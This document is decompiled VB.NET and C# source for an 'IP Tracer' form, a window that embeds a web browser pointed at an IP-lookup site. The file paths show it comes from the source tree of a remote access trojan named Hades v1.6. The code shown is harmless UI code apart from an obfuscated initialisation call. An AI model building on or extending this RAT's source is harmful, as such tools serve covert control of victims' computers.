File: RAT/Hades v1.6/Source/xRAT.vb/xRAT/IP_Tracer.vb
Imports Microsoft.VisualBasic.CompilerServices
Imports System
Imports System.ComponentModel
Imports System.Diagnostics
Imports System.Drawing
Imports System.Runtime.CompilerServices
Imports System.Windows.Forms

Namespace xRAT
    <DesignerGenerated> _
    Public Class IP_Tracer
        Inherits Form
        ' Methods
        Public Sub New()
            Class1.QaIGh5M7cuigS
            Me.InitializeComponent
        End Sub

        <DebuggerNonUserCode> _
        Protected Overrides Sub Dispose(ByVal disposing As Boolean)
            Try 
                If (disposing AndAlso (Not Me.icontainer_0 Is Nothing)) Then
                    Me.icontainer_0.Dispose
                End If
            Finally
                MyBase.Dispose(disposing)
            End Try
        End Sub

        <DebuggerStepThrough> _
        Private Sub InitializeComponent()
            Dim manager As New ComponentResourceManager(GetType(IP_Tracer))
            Me.WebBrowser1 = New WebBrowser
            Me.SuspendLayout
            Me.WebBrowser1.Dock = DockStyle.Fill
            Dim point As New Point(0, 0)
            Me.WebBrowser1.Location = point
            Dim size As New Size(20, 20)
            Me.WebBrowser1.MinimumSize = size
            Me.WebBrowser1.Name = "WebBrowser1"
            size = New Size(&H162, &H13A)
            Me.WebBrowser1.Size = size
            Me.WebBrowser1.TabIndex = 0
            Me.WebBrowser1.Url = New Uri("http://www.trouver-ip.com/", UriKind.Absolute)
            Dim ef As New SizeF(6!, 13!)
            Me.AutoScaleDimensions = ef
            Me.AutoScaleMode = AutoScaleMode.Font
            size = New Size(&H162, &H13A)
            Me.ClientSize = size
            Me.Controls.Add(Me.WebBrowser1)
            Me.Icon = DirectCast(manager.GetObject("$this.Icon"), Icon)
            Me.Name = "IP_Tracer"
            Me.StartPosition = FormStartPosition.CenterScreen
            Me.Text = "IP Tracer"
            Me.ResumeLayout(False)
        End Sub


        ' Properties
        Friend Overridable Property WebBrowser1 As WebBrowser
            Get
                Return Me._WebBrowser1
            End Get
            <MethodImpl(MethodImplOptions.Synchronized)> _
            Set(ByVal value As WebBrowser)
                Me._WebBrowser1 = value
            End Set
        End Property


        ' Fields
        <AccessedThroughProperty("WebBrowser1")> _
        Private _WebBrowser1 As WebBrowser
        Private icontainer_0 As IContainer
    End Class
End Namespace

File: RAT/Hades v1.6/Source/xRAT.cs/xRAT/IP_Tracer.cs
namespace xRAT
{
    using Microsoft.VisualBasic.CompilerServices;
    using System;
    using System.ComponentModel;
    using System.Diagnostics;
    using System.Drawing;
    using System.Runtime.CompilerServices;
    using System.Windows.Forms;

    [DesignerGenerated]
    public class IP_Tracer : Form
    {
        [AccessedThroughProperty("WebBrowser1")]
        private WebBrowser _WebBrowser1;
        private IContainer icontainer_0;

        public IP_Tracer()
        {
            Class1.QaIGh5M7cuigS();
            this.InitializeComponent();
        }

        [DebuggerNonUserCode]
        protected override void Dispose(bool disposing)
        {
            try
            {
                if (disposing && (this.icontainer_0 != null))
                {
                    this.icontainer_0.Dispose();
                }
            }
            finally
            {
                base.Dispose(disposing);
            }
        }

        [DebuggerStepThrough]
        private void InitializeComponent()
        {
            ComponentResourceManager manager = new ComponentResourceManager(typeof(IP_Tracer));
            this.WebBrowser1 = new WebBrowser();
            this.SuspendLayout();
            this.WebBrowser1.Dock = DockStyle.Fill;
            Point point = new Point(0, 0);
            this.WebBrowser1.Location = point;
            Size size = new Size(20, 20);
            this.WebBrowser1.MinimumSize = size;
            this.WebBrowser1.Name = "WebBrowser1";
            size = new Size(0x162, 0x13a);
            this.WebBrowser1.Size = size;
            this.WebBrowser1.TabIndex = 0;
            this.WebBrowser1.Url = new Uri("http://www.trouver-ip.com/", UriKind.Absolute);
            SizeF ef = new SizeF(6f, 13f);
            this.AutoScaleDimensions = ef;
            this.AutoScaleMode = AutoScaleMode.Font;
            size = new Size(0x162, 0x13a);
            this.ClientSize = size;
            this.Controls.Add(this.WebBrowser1);
            this.Icon = (Icon) manager.GetObject("$this.Icon");
            this.Name = "IP_Tracer";
            this.StartPosition = FormStartPosition.CenterScreen;
            this.Text = "IP Tracer";
            this.ResumeLayout(false);
        }

        internal virtual WebBrowser WebBrowser1
        {
            get
            {
                return this._WebBrowser1;
            }
            [MethodImpl(MethodImplOptions.Synchronized)]
            set
            {
                this._WebBrowser1 = value;
            }
        }
    }
}

